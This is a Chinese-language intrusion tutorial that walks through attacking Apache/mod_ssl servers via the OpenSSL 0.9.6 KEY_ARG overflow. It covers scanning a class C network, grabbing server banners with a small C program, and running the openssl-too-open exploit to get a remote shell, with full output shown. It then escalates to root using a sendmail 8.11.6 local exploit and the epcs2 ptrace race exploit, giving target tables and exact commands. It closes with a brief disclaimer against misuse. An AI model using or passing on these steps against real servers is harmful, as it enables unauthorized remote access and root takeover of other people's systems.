apache_openssl漏洞的利用及权限的提升

apache_openssl漏洞的利用及权限的提升

－－nightcat
转载请保持文章完整

第一部分：获得shell.

在packetstorm玩了一段时间，遇到有openssl-too-open.tar.gz这个exploit.
现在看看软件包的描述：
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis

这个描述说明这个exploit 是openssl v 0.9.6的key_arg的漏洞来达到溢出的目的。不过也要
注意apache/mod_ssl的版本信息。对于大多数的有这样条件的都能溢出成功。取得一个id是
nobody shell,有些甚至是root的权限。软件包里面有一个扫描器,exploit。

好象听起来很诱人，down回来研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile? README? linux-x86.c? main.c? main.h? scanner.c? ssl2.c? ssl2.h

习惯性的要读一下软件包的REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息：
1.编译的方法：
直接make就可以，之后就可以得到openssl-too-open和openssl-scanner

2.openssl-too-open的用法：
Usage: ./openssl-too-open [options]
? -a ????????? target architecture (default is 0x00)
? -p ????????? SSL port (default is 443)
? -c ???????????? open N apache connections before sending the shellcode (default is 30)
? -m ???????????? maximum number of open connections (default is 50)
? -v???????????????? verbose mode

Supported architectures:
??????? 0x00 - Gentoo (apache-1.3.24-r2)
??????? 0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
??????? 0x02 - Slackware 7.0 (apache-1.3.26)
??????? 0x03 - Slackware 8.1-stable (apache-1.3.26)
??????? 0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
??????? 0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
??????? 0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
??????? 0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
??????? 0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
??????? 0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
??????? 0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
??????? 0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
??????? 0x0c - SuSE Linux 7.0 (apache-1.3.12)
??????? 0x0d - SuSE Linux 7.1 (apache-1.3.17)
??????? 0x0e - SuSE Linux 7.2 (apache-1.3.19)
??????? 0x0f - SuSE Linux 7.3 (apache-1.3.20)
??????? 0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
??????? 0x11 - SuSE Linux 8.0 (apache-1.3.23)
??????? 0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
??????? 0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
??????? 0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
??????? 0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/****想成功，就要看准系统类型　和apache版本号
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25)：
*****./epenssl-too-open -a 0x07 ip? .就应该可以啦！
****/

3.openssl-scanner的用法：
Usage: ./openssl-scanner [options]
? -i ???? file with target hosts
? -o ??? output log
? -a???????????????? append to output log (requires -o)
? -b???????????????? check for big endian servers
? -C???????????????? scan the entire class C network the host belogs to
? -d???????????????? debug mode
? -w N?????????????? connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
????????? ./openssl-scanner -i hosts -o my.log -w 5
　　　　 ./openssl-scanner -C 192.168.0.0

/****扫描一个c类的ip
*****./openssl-scanner -C 192.168.0.0
****/

?

4.一个实现例子：

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
? by Solar Eclipse <[email protected]>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable

$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html

./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
? by Solar Eclipse <[email protected]>

: Opening 30 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x810b3a0
? ssl1 : 0x810b360
? ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x8103830
? ssl1 : 0x80fd668
? ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
? Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
? ssl0 : 0x8103830
? ssl1 : 0x8103830
? ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830?? start_addr: 0x8103770?? SHELLCODE_OFS: 184
? Reading tag
? Execution of stage1 shellcode succeeded, sending stage2
? Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
? 1:49pm? up? 4:26,? 1 user,? load average: 0.04, 0.07, 0.07
USER???? TTY????? FROM????????????? LOGIN@?? IDLE?? JCPU?? PCPU? WHAT
bash-2.05$

整个README 文件已经说的很明白了：
现在是总结一下实现的过程：
1.通过openssl-scanner来扫描一个c段的ip，找到有漏洞的主机，
2.用nc的方法查找banner得到三个目标内容：apache的版本号，openssl的版本号，操作系统版本3.在通过openssl-too-open来进行溢出得到一个shell.

其中第二步，我写个程序，可以方便得到banner.
/* the www banner scanner .80scanner version 1.0
?*
?* check for the enter ip or daemon to get the banner
?*
?*to complie:
?*user$gcc -o 80scaner 80scanner.c
?*
?*to use:
?*user$./80scanner somedomain.com (i.e. ./80scanner? antionline.com)
?*
?*coded by nightcat
?*march 2004
?*
?* */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

int main(int argc,char *argv[])
{

int s;
struct in_addr addr;
struct sockaddr_in victem;
struct hostent *bad;
char buffer[1024];

if (argc!=2)
{
exit(printf("/nUsage:%s domain.com /n",argv[0]));
}

if ((bad=gethostbyname(argv[1]))==NULL)
{
exit(printf("Error getting hostname/n"));
}

printf("check? web server version/n");
printf("coded by nighcat/n");

system("sleep 2");

s=socket(AF_INET,SOCK_STREAM,0);
if(s<0) exit(printf("socket error/n"));

bcopy(bad->h_addr,(char *)&victem.sin_addr,bad->h_length);
victem.sin_family=AF_INET;
victem.sin_port=htons(80);

if(connect(s,(struct sockaddr*)&victem,sizeof(victem))<0)
{
exit(printf("connect error/n"));
}
printf("/ngetting http version/n/n");
send(s,"HEAD / HTTP/1.0/n/n",17,0);
recv(s,buffer,sizeof(buffer),0);
printf("version:/n%s",buffer);
close(s);

}
在linux简单编译。
nightcat@nightcat$./80banner? www.host.com(172.19.168.1)

第二部分：提升权限

? 我们的目的不是单单得到一个shell.而是得到root.到这里，我们已经了解了主机的系统类型
那好我们找一个local root exploit 就可以得到root.这类exploit实在太多。对于red hat
的系统，我介绍两个，
一个是sendmail的local root exploit：
1.漏洞说明：
/*
?* local exploit for sendmail 8.11.6
?* by sorbo ([email protected])
?* http://www.darkircop.org
?*
?* This exploit takes advantage of the vulnerable prescan() function that
?* allows the user to input 0xff in order to skip the length check of the buffer.
?*
?* The vulnerability was found by Michal Zalewski
?*
?* The goal is to overwrite the 2 lsb of the saved frame pointer and make it
?* point to an area we control.
?*
?* We can overflow pvpbuf[] in parseaddr() (which calls prescan()) and overwrite
?* parseaddr's saved frame pointer.
?* When parseaddr() returns, the control is back to sendtolist() but the frame pointer
?* will be modified (we make it point to somewhere in pvpbuf).
?* We can't just fill pvpbuf with the ret value we want, since sendtolist() doesn't
?* exit right away, but instead makes use of some variables.
?* We need therefore to construct pvpbuf in an intelligent way, so references to variables
?* will be valid.
?* The first variable to set is delimptr (located at ebp - something).
?* We simply make this point to a 0, so the for loop exits.
?* The next variable to set is al (located at ebp - something ). We need to make a->q_next
?* point to 0 so the while loop exits. a->q_next is a+11*4.
?* The next variable is e (ebp + something). We make it point to a 0
?* The next variable is bufp (ebp - something). This needs to be equal to buf to skip the free.
?* This cannot be done since the address contains a 0xff and this cannot be input in pvpbuf.
?* We just make it point to a valid chunk (in our case... our fake chunk). We can't make it point
?* to stack since arena_for_ptr() will fail. Luckily our arguments get copied on the heap, so we
?* just point it to that.
?* Next we just set the ret (ebp + 4) to our shellcode and when sendtolist() exits our
?* shellcode will be executed. Note shellcode is even copied on heap, so non executable stacks will not
?* stop the exploit (the ret addr must match the shellcode location on the heap though)
?*
?* Note that if we overflow ebp by only one byte (putting a 0) i.e. the classical way
?* will not work since the register will not point to pvpbuf. What we do is overwrite two
?* bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the
?* address of pvpbuf untill it is in the range of the ebp. Also our shellcode will be at a low
?* stack address < 0xbffefefe (since we cannot write 0xff in pvpbuf).
?*
?* NOTE: sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
?* be bypassed (in sendtolist()).
?*
?* have fun
?*
?* Greetz: Knight420, Stefano Biondi, nevez
?*
?只要利用prescan()函数长度检查问题

2.详细用法：
Local sendmail 8.11.6 exploit by sorbo ([email protected])
Usage: ./sendmail
-h????? this lame message
-t????? target
-b????? brute force

Id????? Description???? pvpbuf????????? zero??????????? chunk?????????? shellcode addr
0)????? Slackware 8.0?? 0xbffdfef4????? 0xbffe15d6????? 0x80f30a0?????? 0xbffe1f36
1)????? Redhat 7.3????? 0xbffdfcd0????? 0xbffe19a6????? 0x80f30a0?????? 0xbffe1f36
2)????? Redhat 7.2????? 0xbffdfcd0????? 0xbffe19a6????? 0x80f30a0?????? 0xbffe1f36

如果是redhat7.2 简单执行：
.／sendmail -b -t 2　　就可以得到root.

?

另一个是epcs2.c:

/*
?* epcs2 (improved by lst [[email protected]])
?* ~~~~~~~
?* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
?*
?* originally by:
?* (c) 2001 Wojciech Purczynski / cliph / <[email protected]>
?*
?* improved by:
?* lst [[email protected]]
?*
?* This sploit does _not_ use brute force. It does not need that.
?* It does only one attemt to sploit the race condition in execve.
?* Parent process waits for a context-switch that occur after
?* child task sleep in execve.
?*
?* It should work even on openwall-patched kernels (I haven't tested it).
?*
?* Compile it:
?*????? cc epcs.c -o epcs
?* Usage:
?*????? ./epcs [victim]
?*??????????
?* It gives instant root shell with any of a suid binaries.
?*
?* If it does not work, try use some methods to ensure that execve
?* would sleep while loading binary file into memory,
?*
?*????? i.e.: cat /usr/lib/* >/dev/null 2>&1
?*
?* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
?* This exploit does not work on 2.4.x because kernel won't set suid
?* privileges if user ptraces a binary.
?* But it is still exploitable on these kernels.
?*
?* Thanks to Bulba (he made me to take a look at this bug ;) )
?* Greetings to SigSegv team.
?*
?* -- d00t
?* improved by lst [[email protected]]
?* props to kevin for most of the work
?*
?* now works on stack non-exec systems with some neat trickery for the automated
?* method, ie. no need to find the bss segment via objdump
?*
?* particularly it now rewrites the code instruction sets in the
?* dynamic linker _start segment and continues execution from there.
?*
?* an aside, due to the fact that the code self-modified, it wouldnt work
?* quite correctly on a stack non-exec system without playing directly with
?* the bss segment (ie no regs.eip = regs.esp change).? this is much more
?* automated.? however, do note that the previous version did not trigger stack
?* non-exec warnings due to how it was operating.? note that the regs.eip = regs.esp
?* method will break on stack non-exec systems.
?*
?* as always.. enjoy.
?*
?*/
只要利用了execv/ptrace的条件竞选。
2.用法：
?* Usage:
?*????? ./epcs [victim]

这个的用法是可以直接执行：
./epcs 就可以得到root. 如果出现enjoy 那就说明可以得到。

?

第三部分：小结

/*****尽量多的了解你能了解的一切****/
要说的就是：
要明白你所利用的工具的功能，及了解为什么能这样利用。才是我们的真正目的。
入侵只是理解其中道理的一个方法，不要利用我介绍的东西，搞破坏，这个不是我
写文章的目的。

联系我：
qq:1043931
e-mail:[email protected]

?